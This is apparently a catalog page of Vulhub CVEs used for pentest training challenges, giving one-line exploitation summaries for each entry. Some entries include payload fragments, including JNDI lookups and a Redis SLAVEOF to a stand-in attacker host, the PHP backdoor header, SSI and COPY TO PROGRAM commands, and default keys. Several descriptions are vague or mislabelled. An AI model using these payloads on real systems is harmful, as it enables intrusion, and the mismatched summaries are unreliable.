CVE Box
Curated Vulhub vulnerability catalog used to build OFFSEC corporate pentest challenges.
Apache ActiveMQ
CVE-2022-41678
activemq/CVE-2022-41678
CVSS 8.8
HARD
RCE
file
Authenticated Jolokia JMX bridge: POST crafted JSON to invoke ClassPathXmlApplicationContext with attacker-controlled URL for RCE.
Apache ActiveMQ
CVE-2023-46604
activemq/CVE-2023-46604
CVSS 10.0
EASY
RCE
file
Send ExceptionResponse OpenWire packet triggering ClassPathXmlApplicationContext with attacker URL. Loads Spring XML bean that executes OS command.
Apache Airflow
CVE-2020-11978
airflow/CVE-2020-11978
CVSS 8.8
MEDIUM
RCE
file
Authenticated Airflow user exploits command injection in DAG example to run arbitrary OS commands via the Airflow scheduler.
Apache Airflow
CVE-2020-11981
airflow/CVE-2020-11981
CVSS 9.8
MEDIUM
RCE
file
Exploit Airflow Celery executor arbitrary command execution via crafted task payload when the broker is accessible without auth.
AJ-Report
–
aj-report/CNVD-2024-15077
CVSS 9.8
MEDIUM
RCE
file
Unauthenticated RCE in AJ-Report via crafted dataSetParam injection in the test interface that executes Groovy/JS code server-side.
Apache Druid
CVE-2021-25646
apache-druid/CVE-2021-25646
CVSS 9.8
MEDIUM
RCE
file
Unauthenticated RCE via Apache Druid native query with embedded JavaScript or Groovy code when javascript.enabled=true.
Apereo CAS
–
apereo-cas/4.1-rce
CVSS 9.8
HARD
RCE
file
Exploit Java deserialization in Apereo CAS 4.1 via the login endpoint to execute gadget chain and run OS commands.
Apache APISIX
CVE-2020-13945
apisix/CVE-2020-13945
CVSS 8.8
MEDIUM
RCE
file
Exploit Apache APISIX default admin API key (edd1c9f034335f136f87ad84b625c8f1) to manage routes and inject malicious Lua code for RCE.
Apache APISIX
CVE-2021-45232
apisix/CVE-2021-45232
CVSS 9.8
MEDIUM
RCE
file
Unauthenticated RCE via APISIX Dashboard API. Missing auth on /apisix/admin/routes allows creating route with malicious plugin executing OS commands.
Bash
CVE-2014-6271
bash/CVE-2014-6271
CVSS 10.0
EASY
RCE
file
Shellshock: inject OS commands in Bash environment variable values (e.g. User-Agent). CGI scripts pass HTTP headers as env vars, triggering execution.
Cacti
CVE-2022-46169
cacti/CVE-2022-46169
CVSS 9.8
MEDIUM
RCE
file
Unauthenticated command injection in Cacti via X-Forwarded-For header in pollers.php. Inject OS command in the IP parameter processed by poller_item.
Cacti
CVE-2025-24367
cacti/CVE-2025-24367
CVSS 9.8
HARD
RCE
file
Authenticated RCE in Cacti via malicious package import that executes PHP code during the graph template import process.
Chartbrew
CVE-2026-25887
chartbrew/CVE-2026-25887
CVSS 9.8
MEDIUM
RCE
file
SSTI or command injection via Chartbrew dashboard template rendering when user-controlled data flows into server-side rendering engine.
CMS Made Simple
['CVE-2019-9053', 'CVE-2021-26120']
cmsms/CVE-2021-26120
CVSS 9.8
MEDIUM
RCE
file
Unauthenticated SSTI in CMS Made Simple Smarty template engine via crafted URL parameter. Inject {system('cat /flag_proof')} in template context.
Adobe ColdFusion
CVE-2023-26360
coldfusion/CVE-2023-26360
CVSS 8.6
HARD
RCE
file
Unauthenticated path traversal + deserialization in ColdFusion 2021/2023. Reach restricted admin endpoint to trigger arbitrary Java deserialization.
Adobe ColdFusion
CVE-2023-29300
coldfusion/CVE-2023-29300
CVSS 9.8
INSANE
RCE
file
Exploit Java deserialization via ColdFusion WDDX endpoint. Send crafted serialized payload triggering gadget chain to execute OS commands as ColdFusion process.
ComfyUI
CVE-2025-67303
comfyui/CVE-2025-67303
CVSS 9.8
MEDIUM
RCE
file
Server-Side Template Injection or path traversal in ComfyUI workflow nodes allows reading arbitrary files or executing OS commands via crafted workflow JSON.
ComfyUI
CVE-2026-22777
comfyui/CVE-2026-22777
CVSS 9.8
MEDIUM
RCE
file
Unauthenticated RCE in ComfyUI via malicious custom node or workflow that executes arbitrary Python code on the ComfyUI server.
Confluence
CVE-2019-3396
confluence/CVE-2019-3396
CVSS 9.8
MEDIUM
RCE
file
Path traversal in Widget Connector macro loads remote FreeMarker template. Inject SSTI payload or use SSRF to reach internal services.
Confluence
CVE-2021-26084
confluence/CVE-2021-26084
CVSS 9.8
MEDIUM
RCE
file
Unauthenticated OGNL injection via setup wizard endpoint. Evaluates OGNL expression in URL parameter to execute arbitrary OS commands.
Confluence
CVE-2022-26134
confluence/CVE-2022-26134
CVSS 9.8
EASY
RCE
file
Inject OGNL in URI path without auth (e.g. /%24%[email protected]...%7D/). Direct OS command execution via Confluence OGNL evaluation.
Confluence
CVE-2023-22527
confluence/CVE-2023-22527
CVSS 10.0
HARD
RCE
file
Unauthenticated POST to Velocity template endpoint. Template injection payload in body executes OS commands without credentials.
Apache CouchDB
CVE-2017-12636
couchdb/CVE-2017-12636
CVSS 9.0
MEDIUM
RCE
file
Admin sets malicious OS command as query_server (PUT /_config/query_servers/cmd). Trigger via design document view using that server.
Apache CouchDB
CVE-2022-24706
couchdb/CVE-2022-24706
CVSS 10.0
EASY
RCE
db
Default Erlang cookie (monster) allows cluster join via epmd port. Execute arbitrary Erlang code as CouchDB process to read DB contents.
CraftCMS
CVE-2023-41892
craftcms/CVE-2023-41892
CVSS 10.0
HARD
RCE
file
Unauthenticated RCE in Craft CMS via SSTI in Twig template rendering when user input flows into templateString() without sanitization.
CraftCMS
CVE-2024-56145
craftcms/CVE-2024-56145
CVSS 9.8
HARD
RCE
file
PHP object injection in Craft CMS via unsafe unserialize() call. Craft gadget chain allows writing a PHP shell or executing OS commands.
CraftCMS
CVE-2025-32432
craftcms/CVE-2025-32432
CVSS 9.8
INSANE
RCE
file
Pre-auth RCE in Craft CMS 5.x via crafted request to template rendering endpoint that bypasses authentication and evaluates Twig expressions.
OpenPrinting Cups-Browsed
CVE-2024-47177
cups-browsed/CVE-2024-47177
CVSS 9.9
MEDIUM
RCE
file
Send crafted UDP packet to cups-browsed (port 631) with malicious PPD URL. cups-browsed fetches it and executes FoomaticRIPCommandLine for RCE.
Discuz!
–
discuz/wooyun-2010-080723
CVSS 7.5
MEDIUM
RCE
file
Discuz! arbitrary file deletion via crafted formhash parameter. Chain with cache poisoning to achieve PHP code execution.
Docker
–
docker/unauthorized-rce
CVSS 9.8
EASY
RCE
file
Unauthenticated Docker API (port 2375) exposed without TLS. Create privileged container mounting host filesystem to read /flag_proof from host.
Drupal
CVE-2017-6920
drupal/CVE-2017-6920
CVSS 9.8
HARD
RCE
file
YAML deserialization in Drupal 8 via unsafe use of Symfony YAML component. Craft PHP gadget chain in YAML to execute OS commands.
Drupal
CVE-2018-7600
drupal/CVE-2018-7600
CVSS 9.8
EASY
RCE
file
Exploit Form API #access callback bypass on user/register endpoint. Inject PHP via render array without authentication for direct command execution.
Drupal
CVE-2018-7602
drupal/CVE-2018-7602
CVSS 9.8
MEDIUM
RCE
file
Extension of Drupalgeddon2 (CVE-2018-7600) via destination parameter. Exploits same Form API flaw in authenticated or unauthenticated context.
Drupal
CVE-2019-6339
drupal/CVE-2019-6339
CVSS 9.8
HARD
RCE
file
PHAR deserialization via crafted image upload in Drupal. Upload PHAR-as-image, trigger deserialization via file processing to execute PHP gadget chain.
ElasticSearch
CVE-2014-3120
elasticsearch/CVE-2014-3120
CVSS 7.5
EASY
RCE
file
Elasticsearch dynamic scripting: POST /_search with MVEL script 'import java.io.*;new java.util.Scanner(Runtime.exec(cmd).getInputStream()).next()' executes OS commands.
ElasticSearch
CVE-2015-1427
elasticsearch/CVE-2015-1427
CVSS 10.0
MEDIUM
RCE
file
Groovy sandbox escape in Elasticsearch. Send search with script containing java.lang.Math.class.forName('java.lang.Runtime') to bypass sandbox and exec OS commands.
Electron
CVE-2018-1000006
electron/CVE-2018-1000006
CVSS 8.8
MEDIUM
RCE
file
Remote code execution in Electron app on Windows via custom URI scheme handler. Inject command via crafted URI that bypasses shell argument sanitization.
Electron
CVE-2018-15685
electron/CVE-2018-15685
CVSS 8.8
MEDIUM
RCE
file
Electron apps with contextIsolation disabled allow JavaScript from loaded web content to access Node.js APIs and execute OS commands.
elFinder
CVE-2021-32682
elfinder/CVE-2021-32682
CVSS 9.8
MEDIUM
RCE
file
elFinder PHP connector RCE via crafted archive extraction. Upload malicious archive that extracts to web-accessible path with PHP webshell.
Erlang/OTP SSH
CVE-2025-32433
erlang/CVE-2025-32433
CVSS 10.0
EASY
RCE
file
Unauthenticated RCE in Erlang/OTP SSH server. Send crafted SSH message before authentication to execute arbitrary OS commands on the server.
Fastjson
CVE-2017-18349
fastjson/1.2.24-rce
CVSS 9.8
MEDIUM
RCE
file
Send JSON with @type=com.sun.rowset.JdbcRowSetImpl and dataSourceName=ldap://attacker/a. fastjson instantiates class triggering JNDI lookup and remote class loading.
Fastjson
–
fastjson/1.2.47-rce
CVSS 9.8
HARD
RCE
file
Bypass fastjson 1.2.25+ blacklist using java.lang.Class to cache malicious class in loadClass. Then instantiate via JNDI to execute OS commands.
GeoServer
['CVE-2022-24816', 'CVE-2023-35042']
geoserver/CVE-2022-24816
CVSS 9.8
HARD
RCE
file
Eval injection in GeoServer JAI-EXT processing. Crafted raster processing expression executes arbitrary Java code on the server.
GeoServer
CVE-2024-36401
geoserver/CVE-2024-36401
CVSS 9.8
HARD
RCE
file
OGC filter treats property names as XPath/OGC expressions via GeoTools. Craft property name with exec() call for unauthenticated RCE.
Ghostscript
CVE-2018-16509
ghostscript/CVE-2018-16509
CVSS 9.8
EASY
RCE
file
Ghostscript -dSAFER bypass via crafted PostScript. Inject OS command in .ps file processed by Ghostscript via image conversion pipeline.
Ghostscript
CVE-2018-19475
ghostscript/CVE-2018-19475
CVSS 9.8
MEDIUM
RCE
file
Bypass Ghostscript sandbox via pdfwrite device parameters. Crafted PDF triggers arbitrary code execution during rendering.
Ghostscript
CVE-2019-6116
ghostscript/CVE-2019-6116
CVSS 9.8
MEDIUM
RCE
file
Ghostscript sandbox escape via subroutine in procedure params. Craft PostScript to bypass -dSAFER restrictions and execute OS commands.
Git
CVE-2017-8386
git/CVE-2017-8386
CVSS 8.8
MEDIUM
RCE
file
Exploit git-shell command restriction bypass. Send crafted repository name containing shell metacharacters to execute arbitrary commands on git server.
Gitea
–
gitea/1.4-rce
CVSS 8.8
MEDIUM
RCE
file
Exploit Gitea 1.4 Git hooks via repository admin. Set pre-receive/post-receive hook to arbitrary OS command executed on every git push.
GitLab
CVE-2021-22205
gitlab/CVE-2021-22205
CVSS 10.0
MEDIUM
RCE
file
Upload crafted DjVu image with malicious ExifTool metadata to GitLab upload endpoint. ExifTool processes it unauthenticated triggering command injection.
GitList
CVE-2018-1000533
gitlist/CVE-2018-1000533
CVSS 9.8
MEDIUM
RCE
file
Command injection in Gitlist via crafted git object name. The blame view passes user-controlled ref name to git command without proper escaping.
GoAhead
CVE-2017-17562
goahead/CVE-2017-17562
CVSS 8.1
MEDIUM
RCE
file
Exploit GoAhead CGI environment injection via malformed request. Inject environment variables like LD_PRELOAD to load malicious shared library and execute code.
GoAhead
CVE-2021-42342
goahead/CVE-2021-42342
CVSS 9.8
MEDIUM
RCE
file
RCE in GoAhead via crafted multipart request that injects environment variables when CGI is enabled. Shellshock-style attack via HTTP headers.
Grafana
CVE-2024-9264
grafana/CVE-2024-9264
CVSS 9.9
HARD
RCE
file
RCE in Grafana via plugin DuckDB backend. Craft SQL query using DuckDB read_text() or shell execution functions to read /flag_proof.
Springboot H2 Database
CVE-2018-10054
h2database/CVE-2018-10054
CVSS 8.8
MEDIUM
RCE
file
H2 database console allows ALIAS CREATE with Java code execution. CREATE ALIAS EXEC AS 'String exec(String cmd) throws Exception {Runtime.getRuntime().exec(cmd);}'; CALL EXEC('cmd').
Springboot H2 Database
CVE-2021-42392
h2database/CVE-2021-42392
CVSS 9.8
MEDIUM
RCE
file
JNDI injection in H2 database INIT script via JDBC URL. Craft jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT with JNDI lookup for RCE.
Springboot H2 Database
CVE-2022-23221
h2database/CVE-2022-23221
CVSS 9.8
EASY
RCE
file
Unauthenticated H2 console allows direct SQL execution. Execute CREATE ALIAS + CALL to run arbitrary Java/OS commands from the console.
Hadoop YARN
–
hadoop/unauthorized-yarn
CVSS 9.8
EASY
RCE
file
Submit application to YARN ResourceManager REST API (port 8088) without auth. Application executes OS command in new container reading /flag_proof.
Apache HertzBeat
CVE-2024-42323
hertzbeat/CVE-2024-42323
CVSS 9.8
MEDIUM
RCE
file
RCE in HertzBeat monitoring platform via unsafe Groovy script execution in custom monitoring templates accessible to authenticated users.
Apache HTTP Server
–
httpd/ssi-rce
CVSS 7.5
EASY
RCE
file
Upload .shtml file with SSI directive <!--#exec cmd='cat /flag_proof'-->. Apache mod_include executes command when serving the file.
Apache HugeGraph
CVE-2024-27348
hugegraph/CVE-2024-27348
CVSS 9.8
MEDIUM
RCE
file
Unauthenticated RCE in Apache HugeGraph Server via Gremlin API endpoint. Execute Gremlin groovy expression containing Thread.currentThread().getContextClassLoader() for OS command execution.
ImageMagick
CVE-2016-3714
imagemagick/CVE-2016-3714
CVSS 8.4
EASY
RCE
file
ImageTragick: upload crafted MVG/SVG with 'url(https://|cmd)' directive. ImageMagick executes embedded shell command during image processing.
ImageMagick
CVE-2020-29599
imagemagick/CVE-2020-29599
CVSS 7.8
HARD
RCE
file
Inject shell commands in ImageMagick -authenticate parameter via crafted filename. Commands execute during image processing pipeline.
ingress-nginx
CVE-2025-1974
ingress-nginx/CVE-2025-1974
CVSS 9.8
INSANE
RCE
file
RCE in ingress-nginx controller via AdmissionWebhook. Craft malicious Ingress annotation containing nginx config injection that executes OS commands.
Jackson-Databind
CVE-2017-7525
jackson/CVE-2017-7525
CVSS 9.8
HARD
RCE
file
Jackson deserialization RCE via @type field. Send crafted JSON with com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl to execute OS commands.
Java RMI
–
java/rmi-codebase
CVSS 9.8
HARD
RCE
file
Java RMI remote class loading: connect to exposed RMI registry, invoke method that triggers codebase URL fetch. Server loads and executes remote class.
Java RMI
–
java/rmi-registry-bind-deserialization-bypass
CVSS 9.8
HARD
RCE
file
Bypass RMI registry bind restrictions (post-JDK8u141) using DGC (Distributed Garbage Collector) endpoint for unauthenticated deserialization RCE.
Java RMI
–
java/rmi-registry-bind-deserialization
CVSS 9.8
HARD
RCE
file
Java RMI registry deserialization: send crafted serialized object to RMI registry bind() call. Registry deserializes payload executing gadget chain.
JBoss
CVE-2017-12149
jboss/CVE-2017-12149
CVSS 9.8
MEDIUM
RCE
file
POST Java serialized Commons-Collections gadget to /invoker/JMXInvokerServlet. JBoss deserializes without auth executing OS commands.
JBoss
CVE-2017-7504
jboss/CVE-2017-7504
CVSS 9.8
MEDIUM
RCE
file
POST serialized Java payload to /invoker/JMXInvokerServlet (HTTP Invoker). JBoss EAP 4.x deserializes unauthenticated requests for RCE.
JBoss
–
jboss/JMXInvokerServlet-deserialization
CVSS 9.8
MEDIUM
RCE
file
Send HTTP POST with Java deserialization payload to JMXInvokerServlet or EJBInvokerServlet. Use Commons-Collections gadget chain for OS command execution.
Jenkins
CVE-2017-1000353
jenkins/CVE-2017-1000353
CVSS 9.8
HARD
RCE
file
Java deserialization in Jenkins CLI via crafted Java serialized object sent to TCP port 50000. Commons-Collections gadget chain executes OS commands.
Jenkins
CVE-2018-1000861
jenkins/CVE-2018-1000861
CVSS 9.8
HARD
RCE
file
Exploit Stapler routing to reach unauthenticated ClassPathResourceHandler. Chain with dynamic routing to access restricted endpoints and execute Groovy scripts.
JimuReport
CVE-2023-4450
jimureport/CVE-2023-4450
CVSS 9.8
EASY
RCE
file
Unauthenticated SSTI in JimuReport queryFieldBySql endpoint. Inject FreeMarker template expression that executes OS commands without authentication.
Apache Jmeter
CVE-2018-1297
jmeter/CVE-2018-1297
CVSS 9.8
EASY
RCE
file
Unauthenticated RCE in JMeter via exposed RMI registry (port 1099). Connect and invoke RCE via JMXConnector to execute arbitrary Java code.
Apache Kafka
CVE-2023-25194
kafka/CVE-2023-25194
CVSS 8.8
HARD
RCE
file
Authenticated Kafka Connect REST API allows JDBC connector with JNDI URL in connection string. Triggers JNDI lookup and remote class loading for RCE.
Kibana
CVE-2019-7609
kibana/CVE-2019-7609
CVSS 8.1
MEDIUM
RCE
file
Kibana Timelion prototype pollution via .es() expression. Pollute Object.prototype to execute OS commands when canvas renders the visualization.
Kibana
CVE-2020-7012
kibana/CVE-2020-7012
CVSS 7.2
MEDIUM
RCE
file
Kibana SSTI via Vega visualization spec. Craft Vega spec with arbitrary JavaScript in signal handlers that executes in Kibana server context.
kkFileView
–
kkfileview/4.3-zipslip-rce
CVSS 9.8
MEDIUM
RCE
file
Zip-slip vulnerability in kkFileView document preview server. Upload crafted ZIP with path traversal to overwrite web-accessible files and achieve RCE.
Langflow
CVE-2025-3248
langflow/CVE-2025-3248
CVSS 9.8
MEDIUM
RCE
file
Unauthenticated RCE in Langflow via /api/v1/run endpoint. Execute arbitrary Python code through crafted flow definition without authentication.
Laravel
CVE-2021-3129
laravel/CVE-2021-3129
CVSS 9.8
HARD
RCE
file
Laravel debug mode: exploit Ignition make-script to write Phar to log path. Trigger Phar deserialization via log manipulation for RCE.
Liferay Portal
CVE-2020-7961
liferay-portal/CVE-2020-7961
CVSS 9.8
HARD
RCE
file
Liferay Portal Java deserialization via /api/jsonws. POST crafted serialized payload invoking Commons-Collections gadget chain for unauthenticated RCE.
Laravel Livewire
CVE-2025-54068
livewire/CVE-2025-54068
CVSS 9.8
MEDIUM
RCE
file
File upload path traversal in Laravel Livewire. Upload component stores files at attacker-controlled path outside intended directory, enabling webshell placement.
Apache Log4j
CVE-2017-5645
log4j/CVE-2017-5645
CVSS 9.8
MEDIUM
RCE
file
Log4j 1.x SocketServer deserialization: connect to exposed port and send serialized Java payload. Commons-Collections gadget chain executes OS commands.
Apache Log4j
CVE-2021-44228
log4j/CVE-2021-44228
CVSS 10.0
MEDIUM
RCE
file
Inject ${jndi:ldap://attacker/a} in User-Agent or X-Api-Version header. Host rogue LDAP server returning class executing OS commands. Read /flag_proof after shell access.
Metabase
CVE-2023-38646
metabase/CVE-2023-38646
CVSS 9.8
HARD
RCE
file
Pre-auth RCE in Metabase via H2 database JDBC URL injection in setup endpoint. Craft JDBC URL with INIT script executing OS commands.
MeterSphere
–
metersphere/plugin-rce
CVSS 9.8
INSANE
RCE
file
MeterSphere plugin upload functionality allows arbitrary JAR execution. Upload malicious plugin with embedded RCE payload that reads /flag_proof on activation.
Mongo Express
CVE-2019-10758
mongo-express/CVE-2019-10758
CVSS 9.8
EASY
RCE
file
RCE in mongo-express via unsafe eval of BSON. Send crafted collection query with JavaScript payload to execute commands: {$where: 'return run("cat","/flag_proof")'}
Nacos
CVE-2021-29442
nacos/CVE-2021-29442
CVSS 7.5
MEDIUM
RCE
db
Nacos Derby SQL injection via the QoS endpoint. Inject SQL payload in GET /nacos/v1/cs/ops/derby?sql= to extract user credentials from internal Derby database.
Nexus Repository Manager
CVE-2019-7238
nexus/CVE-2019-7238
CVSS 9.8
MEDIUM
RCE
file
Sonatype Nexus Repository Manager RCE via Groovy script in REST API. POST crafted Groovy payload to /_api/rest/v1/script endpoint to execute OS commands.
Nexus Repository Manager
CVE-2020-10199
nexus/CVE-2020-10199
CVSS 9.8
MEDIUM
RCE
file
Nexus Repository Manager 3.x EL injection in asset upload API. Inject EL expressions in filename parameter to achieve RCE without authentication.
Nexus Repository Manager
CVE-2020-10204
nexus/CVE-2020-10204
CVSS 7.5
HARD
RCE
file
Nexus Repository Manager 3.x privilege escalation via role manipulation. Chain CSRF with authenticated session to elevate privileges and access admin functions.
node-postgres
CVE-2017-16082
node/CVE-2017-16082
CVSS 9.8
HARD
RCE
file
Remote code execution in node-postgres via prototype pollution. Inject malicious __proto__ properties in query parameters to achieve RCE in Node.js application.
Apache OFBiz
CVE-2020-9496
ofbiz/CVE-2020-9496
CVSS 9.8
HARD
RCE
file
Apache OFBiz XML-RPC deserialization RCE. Send crafted serialized Java object to /webtools/control/xmlrpc endpoint without authentication to execute OS commands.
Apache OFBiz
CVE-2023-51467
ofbiz/CVE-2023-51467
CVSS 9.8
EASY
RCE
file
Apache OFBiz authentication bypass via URL manipulation. Append USERNAME&PASSWORD&requirePasswordChange=Y to bypass login check and access admin functions.
Apache OFBiz
CVE-2024-38856
ofbiz/CVE-2024-38856
CVSS 9.8
MEDIUM
RCE
file
Apache OFBiz pre-auth RCE via view override parameter. Combine authentication bypass with ProgramExport to execute arbitrary Groovy code as unauthenticated user.
Apache OFBiz
CVE-2024-45195
ofbiz/CVE-2024-45195
CVSS 9.8
HARD
RCE
file
Apache OFBiz direct request bypass chained with SSTI. Exploit override view mechanism to inject server-side template expressions and achieve code execution.
Apache OFBiz
CVE-2024-45507
ofbiz/CVE-2024-45507
CVSS 9.8
INSANE
RCE
file
Apache OFBiz SSRF via ViewHandlerExt chained with internal service abuse. Pivot through internal network using SSRF to reach restricted management endpoints.
OpenSMTPD
CVE-2020-7247
opensmtpd/CVE-2020-7247
CVSS 10.0
MEDIUM
RCE
file
OpenSMTPD remote code execution via malicious MAIL FROM address. Send SMTP envelope with shell metacharacters in sender address to execute OS commands as root.
OpenTSDB
CVE-2020-35476
opentsdb/CVE-2020-35476
CVSS 9.8
HARD
RCE
file
OpenTSDB parameter injection via HTTP API allows command execution. Inject shell metacharacters in gnuplot parameters via metric query to execute OS commands.
OpenTSDB
CVE-2023-25826
opentsdb/CVE-2023-25826
CVSS 9.8
HARD
RCE
file
OpenTSDB SSRF and RCE via telnet API endpoint. Connect to telnet interface, inject HTTP parameter in metric name to execute gnuplot commands and read files.
PDF.js
CVE-2024-4367
pdfjs/CVE-2024-4367
CVSS 8.8
HARD
RCE
file
PDF.js arbitrary JavaScript execution via malicious PDF font name. Serve crafted PDF that executes JS when rendered in browser, triggering XSS to exfiltrate session cookies.
pgAdmin
CVE-2022-4223
pgadmin/CVE-2022-4223
CVSS 9.8
MEDIUM
RCE
file
pgAdmin 4 path traversal allows reading files outside web root. Exploit directory traversal in the file manager to access /flag_proof on the server.
pgAdmin
CVE-2023-5002
pgadmin/CVE-2023-5002
CVSS 8.8
MEDIUM
RCE
file
pgAdmin 4 open redirect and CSRF token bypass. Chain open redirect with CSRF to perform admin actions without authorization and read sensitive configuration.
pgAdmin
CVE-2025-2945
pgadmin/CVE-2025-2945
CVSS 9.8
INSANE
RCE
file
pgAdmin 4 remote code execution via query tool. Abuse COPY TO/FROM PROGRAM PostgreSQL feature through pgAdmin interface to execute OS commands.
pgAdmin
CVE-2025-13780
pgadmin/CVE-2025-13780
CVSS 9.8
HARD
RCE
file
pgAdmin 4 MFA bypass via session fixation. Manipulate session state to skip multi-factor authentication and access admin panel directly.
PHP
–
php/8.1-backdoor
CVSS 9.8
EASY
RCE
file
PHP 8.1.0-dev backdoor via User-Agentt header. Send HTTP request with User-Agentt: zerodiumsystem('cat /flag_proof'); to execute arbitrary PHP code.
PHP-CGI
CVE-2012-1823
php/CVE-2012-1823
CVSS 9.8
MEDIUM
RCE
file
PHP CGI argument injection allows remote code execution. Append ?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input to URL with PHP payload in body.
PHP-IMAP
CVE-2018-19518
php/CVE-2018-19518
CVSS 9.8
HARD
RCE
file
PHP imap_open SSRF/RCE via imap_open() with mailbox argument injection. Inject shell metacharacters in imap server parameter to execute OS commands via sendmail.
PHP-FPM
CVE-2019-11043
php/CVE-2019-11043
CVSS 9.8
MEDIUM
RCE
file
PHP-FPM buffer underflow RCE via nginx fastcgi_split_path_info regex. Send path with newline character to corrupt FPM memory and execute arbitrary code.
PHP
CVE-2024-2961
php/CVE-2024-2961
CVSS 9.8
HARD
RCE
file
PHP iconv buffer overflow via crafted string conversion. Exploit heap overflow in iconv to achieve RCE through carefully crafted input to conversion functions.
PHP-FPM
–
php/fpm
CVSS 9.8
MEDIUM
RCE
file
PHP-FPM misconfiguration exposes port 9000 directly. Use Fastcgi protocol client to send requests directly to PHP-FPM, bypassing nginx access controls.
PHP
–
php/inclusion
CVSS 7.5
EASY
RCE
file
PHP Local File Inclusion via unvalidated include path parameter. Use ?page=../../../../flag_proof or PHP filter wrappers like php://filter/read to include flag file.
PHP
–
php/xdebug-rce
CVSS 9.8
EASY
RCE
file
PHP Xdebug remote execution via exposed debug port 9000. Connect to Xdebug protocol, set breakpoint, and eval PHP code to read /flag_proof file.
phpMyAdmin
CVE-2016-5734
phpmyadmin/CVE-2016-5734
CVSS 9.8
MEDIUM
RCE
file
phpMyAdmin RCE via preg_replace /e modifier in older PHP. Exploit SQL query with crafted regex replacement to execute PHP code through database query.
PHPUnit
CVE-2017-9841
phpunit/CVE-2017-9841
CVSS 9.8
EASY
RCE
file
PHPUnit remote code execution via eval-stdin.php utility exposed in vendor directory. POST PHP code to /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php for instant RCE.
PostgreSQL
CVE-2019-9193
postgres/CVE-2019-9193
CVSS 9.8
MEDIUM
RCE
file
PostgreSQL COPY TO/FROM PROGRAM command execution. Use COPY (SELECT '') TO PROGRAM 'cat /flag_proof > /tmp/out' to execute OS commands via superuser SQL.
Python
CVE-2017-8291
python/PIL-CVE-2017-8291
CVSS 7.8
HARD
RCE
file
Pillow ghostscript command injection via EPS file processing. Upload crafted EPS image that injects shell commands through ghostscript interpreter during processing.
Python
CVE-2018-16509
python/PIL-CVE-2018-16509
CVSS 9.8
HARD
RCE
file
Pillow ImageMagick command injection via PDF processing. Upload crafted PDF that exploits ghostscript MVSave vulnerability to execute OS commands.
Python
–
python/unpickle
CVSS 9.8
EASY
RCE
file
Python pickle deserialization RCE. Craft malicious pickle object using __reduce__ to execute OS commands: encode os.system('cat /flag_proof') in pickle payload.
React
CVE-2025-55182
react/CVE-2025-55182
CVSS 9.8
INSANE
RCE
file
React Server Components arbitrary file read via improper sanitization of server action imports. Craft malicious import path to read /flag_proof from server filesystem.
Redis
–
redis/4-unacc
CVSS 9.8
EASY
RCE
file
Redis unauthenticated access on port 6379. Connect directly: redis-cli -h target SLAVEOF attacker 6379, then use replication to write SSH key or cron for RCE.
Redis
CVE-2022-0543
redis/CVE-2022-0543
CVSS 10.0
MEDIUM
RCE
file
Redis Lua sandbox escape via package.loadlib. Execute eval 'return package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so","luaopen_io")()' to achieve RCE.
Apache RocketMQ
CVE-2023-33246
rocketmq/CVE-2023-33246
CVSS 9.8
MEDIUM
RCE
file
Apache RocketMQ RCE via NameServer configuration update command. Send crafted update config request to port 9876 to execute OS commands through broker config injection.
Ruby
CVE-2017-17405
ruby/CVE-2017-17405
CVSS 9.8
MEDIUM
RCE
file
Ruby Net::FTP command injection via crafted FTP server response. Exploit PASV response parsing to inject OS commands through FTP client library.
SaltStack
CVE-2020-16846
saltstack/CVE-2020-16846
CVSS 9.8
MEDIUM
RCE
file
SaltStack shell injection via salt-api netapi. Send crafted request to /run endpoint with eauth=auto and shell metacharacters in client parameter to execute OS commands.
Samba
CVE-2017-7494
samba/CVE-2017-7494
CVSS 10.0
MEDIUM
RCE
file
SambaCry: RCE in Samba writable share via shared library injection. Upload .so file to writable share, trigger load via IPC$ to execute arbitrary code (EternalRed).
Apache Shiro
CVE-2016-4437
shiro/CVE-2016-4437
CVSS 9.8
MEDIUM
RCE
file
Apache Shiro RememberMe cookie deserialization RCE. Encrypt malicious Java serialized payload with default AES key kPH+bIxk5D2deZiIxcaaaA== and send as rememberMe cookie.
ShowDoc
–
showdoc/CNVD-2020-26585
CVSS 9.8
MEDIUM
RCE
file
ShowDoc arbitrary file upload via CKEditor image upload endpoint. Upload PHP webshell disguised as image to /public/uploads/ directory and execute commands.
Apache Solr
CVE-2017-12629
solr/CVE-2017-12629-RCE
CVSS 9.8
MEDIUM
RCE
file
Apache Solr XXE+SSRF leading to RCE via RunExecutableListener. Enable listener via Config API then trigger via query to execute OS commands on Solr server.
Apache Solr
CVE-2019-0193
solr/CVE-2019-0193
CVSS 9.8
MEDIUM
RCE
file
Apache Solr DataImportHandler RCE via script transformer. POST malicious Groovy script in DIH config to execute OS commands during data import.
Apache Solr
CVE-2019-17558
solr/CVE-2019-17558
CVSS 9.8
HARD
RCE
file
Apache Solr Velocity template injection via Params ResourceLoader. Enable params.resource.loader.enabled then inject Velocity template in qt parameter for RCE.
Apache Spark
–
spark/unacc
CVSS 9.8
EASY
RCE
file
Apache Spark unauthenticated REST API access. Submit malicious Spark job via POST /api/v1/applications or access master UI on port 8080 to execute code via job submission.
Spring Security Oauth2
CVE-2016-4977
spring/CVE-2016-4977
CVSS 9.8
MEDIUM
RCE
file
Spring Security OAuth2 RCE via SpEL injection in error response. Craft malicious authorization request with SpEL expression in scope parameter for code execution.
Spring Webflow
CVE-2017-4971
spring/CVE-2017-4971
CVSS 8.8
HARD
RCE
file
Spring Web Flow RCE via EL injection in flow definition expressions. Inject SpEL expressions via form field binding to execute arbitrary Java code.
Spring Data Rest
CVE-2017-8046
spring/CVE-2017-8046
CVSS 9.8
EASY
RCE
file
Spring Data REST RCE via PATCH request with JSON Merge Patch. Send PATCH with T(java.lang.Runtime).getRuntime().exec() in path expression for RCE.
Spring Messaging
CVE-2018-1270
spring/CVE-2018-1270
CVSS 9.8
MEDIUM
RCE
file
Spring Framework RCE via STOMP messaging over WebSocket. Inject SpEL expression in Message header subscription selector to execute OS commands.
Spring Data Commons
CVE-2018-1273
spring/CVE-2018-1273
CVSS 9.8
EASY
RCE
file
Spring Data Commons RCE via SpEL injection in property path. Send POST with T(java.lang.Runtime).getRuntime().exec() in property binding expressions.
Spring Cloud Gateway
CVE-2022-22947
spring/CVE-2022-22947
CVSS 10.0
MEDIUM
RCE
file
